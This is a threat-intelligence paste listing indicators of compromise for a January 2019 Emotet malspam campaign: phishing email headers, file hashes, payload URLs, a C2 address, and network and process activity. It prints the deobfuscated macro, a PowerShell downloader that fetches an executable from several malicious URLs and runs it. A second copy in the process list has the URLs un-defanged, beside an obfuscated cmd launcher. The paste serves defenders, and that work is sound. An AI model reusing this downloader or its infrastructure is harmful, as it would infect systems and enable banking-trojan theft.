SHARE
TWEET

#emotet_280119

VRad Jan 28th, 2019 (edited) 206 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #emotet #feodo #banker #xml #powershell
  2.  
  3. https://pastebin.com/z2TDfM7s
  4.  
  5. previous contact:
  6. 23/01/18        https://pastebin.com/D9TDts5J
  7. 20/12/18        https://pastebin.com/EejcbL4t
  8. 04/12/18        https://pastebin.com/znQDtbnt  
  9. 09/11/18        https://pastebin.com/THHMs2wg
  10. 01/10/18        https://pastebin.com/Y6DnbpHv
  11.  
  12. FAQ:
  13. https://twitter.com/dvk01uk/status/1087660817452011520
  14. https://pastebin.com/g8gMJKui
  15. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
  16. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
  17.  
  18. attack_vector
  19. --------------
  20. email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe
  21.  
  22. email_headers
  23. --------------
  24. Received: from qproxy4-pub.mail.unifiedlayer.com (qproxy4-pub.mail.unifiedlayer.com [66.147.248.250])
  25.     by srv8.victim1.com for <user0@org7.victim1.com>;
  26.     (envelope-from muhammad.suleman@ff.com.pk)
  27. Received: from cmgw11.unifiedlayer.com (unknown [10.9.0.11])
  28.     by qproxy4.mail.unifiedlayer.com (Postfix) for <user0@org7.victim1.com>;
  29. Received: from box675.bluehost.com ([66.147.244.175])
  30. Received: from [190.183.58.77] (port=59810 helo=10.4.44.65)
  31.     by box675.bluehost.com (envelope-from <muhammad.suleman@ff.com.pk>)
  32. Date: Mon, 28 Jan 2019 04:03:36 -0300
  33. From: Цимбаленко <otsimbalenko@org0.ua> <muhammad.suleman@ff.com.pk>
  34. To: user0@org7.victim1.com
  35. Subject: Invoices from Цимбаленко
  36.  
  37. files
  38. --------------
  39. SHA-256 4e4074f7239656bdf361fc6bc8df862ed053105036d3bfad718f6492bc313465
  40. File name   INV_JSO9316077-679.doc  (XML)
  41. File size   134.98 KB
  42.  
  43. SHA-256 79d4e70bf4c1f9eb8dc0c6e765fc2f5d1f48737fc0859a8a1130d99e65e441a2
  44. File name   0C0sib5OX.exe       (PE)
  45. File size   140 KB
  46.  
  47. activity
  48. **************
  49.  
  50. deobfuscated_macro
  51. --------------
  52. powershell $apcjv='quduu';$wajal=new-object Net.WebClient;$dhbwoqn='tunerg{.} com/VhIZE8i3Fn@stoutarc{.} com@leonardokubrick{.} com/VvJBwtEF5w@antigua.aguilarnoticias{.} com/t1JnOLFO@regenerationcongo{.} com/UL2s3PGpv0'.Split('@');$vwhpj='wnwumd';$tzimwc = '604';$cktii='fppqf';$wvmjf=$env:temp+'\'+$tzimwc+'.exe';foreach($kkffho in $dhbwoqn){try{$wajal.DownloadFile($kkffho, $wvmjf);$ksimd='hwori';If ((Get-Item $wvmjf).length -ge 40000) {Invoke-Item $wvmjf;$oikri='kbccf';break;}}catch{}}$zqlki='cirmiw';
  53.  
  54.  
  55. pl_src:     4/5
  56. --------------
  57. tunerg{.} com/VhIZE8i3Fn        200
  58. stoutarc{.} com             200
  59. leonardokubrick{.} com/VvJBwtEF5w   200
  60. antigua.aguilarnoticias{.} com/t1JnOLFO 404 (reported)
  61. regenerationcongo{.} com/UL2s3PGpv0 200
  62.  
  63. C2:
  64. --------------
  65. 187.155.130.72:8080
  66.  
  67. netwrk
  68. --------------
  69. 210.188.201.17      tunerg{.} com   GET /VhIZE8i3Fn HTTP/1.1    noUA
  70. 187.155.130.72:8080
  71.  
  72. comp
  73. --------------
  74. powershtll.exe  2676    TCP 210.188.201.17  80  ESTABLISHED
  75. turnedbased.exe 1648    TCP 201.194.127.211 990 SYN_SENT
  76.  
  77. proc
  78. --------------
  79. C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
  80. c:\windows\system32\cmd.exe c:\oucvl\ffaiizm\klfrwkw\..\..\..\windows\system32\cmd.exe  /c CmD /V:O/C"set vb=eL{~6'1i0fp;S4oFl2u@g.dwGUJ:EsyTh(CPb\czNmVvD=xkW$AZa-I )3}n/M8+%OB,5qrjt&&for %Z in ...do set ao=!ao!!vb:~%Z,1!&&if %Z==83 echo !ao:~-577!|cmd.exe"
  81. C:\Windows\system32\cmd.exe CmD  /V:O/C"set vb=eL{~6'1i0fp;S4oFl2u@g.dwGUJ:EsyTh(CPb\czNmVvD=xkW$AZa-I )3}n/M8+%OB,5qrjt&&for %Z in ...do set ao=!ao!!vb:~%Z,1!&&if %Z==83 echo !ao:~-577!|cmd.exe"
  82. C:\Windows\system32\cmd.exe
  83. C:\Windows\System32\WindowsPowerShell\v1.0\powershtll.exe powershtll  $apcjv='quduu';$wajal=new-object Net.WebClient;$dhbwoqn='http://tunerg.com/VhIZE8i3Fn@http://stoutarc.com/J8htynMd3@http://leonardokubrick.com/VvJBwtEF5w@http://antigua.aguilarnoticias.com/t1JnOLFO@http://regenerationcongo.com/UL2s3PGpv0'.Split('@');$vwhpj='wnwumd';$tzimwc = '604';$cktii='fppqf';$wvmjf=$env:temp+'\'+$tzimwc+'.exe';foreach($kkffho in $dhbwoqn){try{$wajal.DownloadFile($kkffho, $wvmjf);$ksimd='hwori';If ((Get-Item $wvmjf).length -ge 40000) {Invoke-Item $wvmjf;$oikri='kbccf';break;}}catch{}}$zqlki='cirmiw';
  84. C:\tmp\604.exe
  85. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
  86.  
  87. persist
  88. --------------
  89. n/a
  90.  
  91. drop
  92. --------------
  93. C:\tmp\604.exe
  94. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
  95.  
  96. # # #
  97. https://www.virustotal.com/#/file/4e4074f7239656bdf361fc6bc8df862ed053105036d3bfad718f6492bc313465/details
  98. https://www.virustotal.com/#/file/79d4e70bf4c1f9eb8dc0c6e765fc2f5d1f48737fc0859a8a1130d99e65e441a2/details
  99. https://analyze.intezer.com/#/analyses/0bb6533d-294a-45ab-a85b-6b546e993db3
  100.  
  101. VR
  102.  
  103. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top